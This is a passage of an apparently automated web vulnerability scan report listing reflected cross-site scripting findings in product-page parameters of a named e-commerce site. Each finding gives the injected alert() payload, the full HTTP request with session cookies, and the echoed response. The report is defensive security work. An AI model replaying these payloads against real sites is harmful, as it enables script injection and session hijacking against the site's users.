User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:06:38 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="hidden" name="key" value="e0a8d"><script>alert(1)</script>379f3fe056866076e">
...[SNIP]...

3.82. http://www.munichmyway.com/ecommerce/products/prodDetail.cfm [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /ecommerce/products/prodDetail.cfm

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9541'%3balert(1)//ee30cd37f24 was submitted in the t parameter. This input was echoed as e9541';alert(1)//ee30cd37f24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ecommerce/products/prodDetail.cfm?id=41&categoryId=95&b=5989&h=6025&p=6061&m=6097&x=6166&y=6202&z=6364&d=6337&g=6363&f=6415&l=6426&c=6427&t=6463e9541'%3balert(1)//ee30cd37f24 HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; LANGUAGEID=1; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.1.10.1305467942

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:25:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:25:41 GMT
Content-Length: 178217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Boxa My Way Action | MUNICH MY WAY</title>

<meta http-equiv="C
...[SNIP]...
<script type="text/javascript" language="javascript">
                                       window.addEvent('domready', function(){var el = E('optionValue6463e9541';alert(1)//ee30cd37f24'); if( el && el.checked )el.onclick();var el = E('optionValue6463e9541';alert(1)//ee30cd37f24'); if( el && el.checked )el.onclick();var el = E('optionValue6463e9541';alert(1)//ee30cd37f24'); if( el &&
...[SNIP]...

3.83. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue100 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue100 request parameter is copied into the HTML document as plain text between tags. The payload f5b6b<img%20src%3da%20onerror%3dalert(1)>5a0874cdcf was submitted in the buyForm3021_optionValue100 parameter. This input was echoed as f5b6b<img src=a onerror=alert(1)>5a0874cdcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867f5b6b<img%20src%3da%20onerror%3dalert(1)>5a0874cdcf&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021

Response

HTTP/1.1 500 Invalid data 867f5b6b<img src=a onerror=alert(1)>5a0874cdcf for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:21:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:21:56 GMT
Content-Length: 14073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 867f5b6b<img src=a onerror=alert(1)>5a0874cdcf for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.84. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue101 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue101 request parameter is copied into the HTML document as plain text between tags. The payload a3ac9<img%20src%3da%20onerror%3dalert(1)>ca9319cd559 was submitted in the buyForm3021_optionValue101 parameter. This input was echoed as a3ac9<img src=a onerror=alert(1)>ca9319cd559 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893a3ac9<img%20src%3da%20onerror%3dalert(1)>ca9319cd559&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optio
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 893a3ac9<img src=a onerror=alert(1)>ca9319cd559 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:12:34 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:12:34 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 893a3ac9<img src=a onerror=alert(1)>ca9319cd559 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.85. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue102 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue102 request parameter is copied into the HTML document as plain text between tags. The payload 5b2b4<img%20src%3da%20onerror%3dalert(1)>2dae0cf4193 was submitted in the buyForm3021_optionValue102 parameter. This input was echoed as 5b2b4<img src=a onerror=alert(1)>2dae0cf4193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=9315b2b4<img%20src%3da%20onerror%3dalert(1)>2dae0cf4193&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_o
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 9315b2b4<img src=a onerror=alert(1)>2dae0cf4193 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:10:29 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:10:28 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 9315b2b4<img src=a onerror=alert(1)>2dae0cf4193 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.86. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue103 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue103 request parameter is copied into the HTML document as plain text between tags. The payload 1d394<img%20src%3da%20onerror%3dalert(1)>839fc1af98d was submitted in the buyForm3021_optionValue103 parameter. This input was echoed as 1d394<img src=a onerror=alert(1)>839fc1af98d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=9601d394<img%20src%3da%20onerror%3dalert(1)>839fc1af98d&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_opti
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 9601d394<img src=a onerror=alert(1)>839fc1af98d for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:17:45 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:17:44 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 9601d394<img src=a onerror=alert(1)>839fc1af98d for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.87. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue104 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue104 request parameter is copied into the HTML document as plain text between tags. The payload e956a<img%20src%3da%20onerror%3dalert(1)>961ffc32d71 was submitted in the buyForm3021_optionValue104 parameter. This input was echoed as e956a<img src=a onerror=alert(1)>961ffc32d71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993e956a<img%20src%3da%20onerror%3dalert(1)>961ffc32d71&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 993e956a<img src=a onerror=alert(1)>961ffc32d71 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:11:31 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:11:31 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 993e956a<img src=a onerror=alert(1)>961ffc32d71 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.88. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue234 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue234 request parameter is copied into the HTML document as plain text between tags. The payload 20625<img%20src%3da%20onerror%3dalert(1)>ec7ca72f201 was submitted in the buyForm3021_optionValue234 parameter. This input was echoed as 20625<img src=a onerror=alert(1)>ec7ca72f201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ons=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=490120625<img%20src%3da%20onerror%3dalert(1)>ec7ca72f201&id=3021

Response

HTTP/1.1 500 Invalid data 490120625<img src=a onerror=alert(1)>ec7ca72f201 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:23:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:23:55 GMT
Content-Length: 14077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 490120625<img src=a onerror=alert(1)>ec7ca72f201 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.89. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue89 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue89 request parameter is copied into the HTML document as plain text between tags. The payload b535d<img%20src%3da%20onerror%3dalert(1)>da236fdb197 was submitted in the buyForm3021_optionValue89 parameter. This input was echoed as b535d<img src=a onerror=alert(1)>da236fdb197 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ions=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534b535d<img%20src%3da%20onerror%3dalert(1)>da236fdb197&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 534b535d<img src=a onerror=alert(1)>da236fdb197 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:14:39 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:14:38 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 534b535d<img src=a onerror=alert(1)>da236fdb197 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.90. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue90 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue90 request parameter is copied into the HTML document as plain text between tags. The payload c4005<img%20src%3da%20onerror%3dalert(1)>d2da79f8cd3 was submitted in the buyForm3021_optionValue90 parameter. This input was echoed as c4005<img src=a onerror=alert(1)>d2da79f8cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
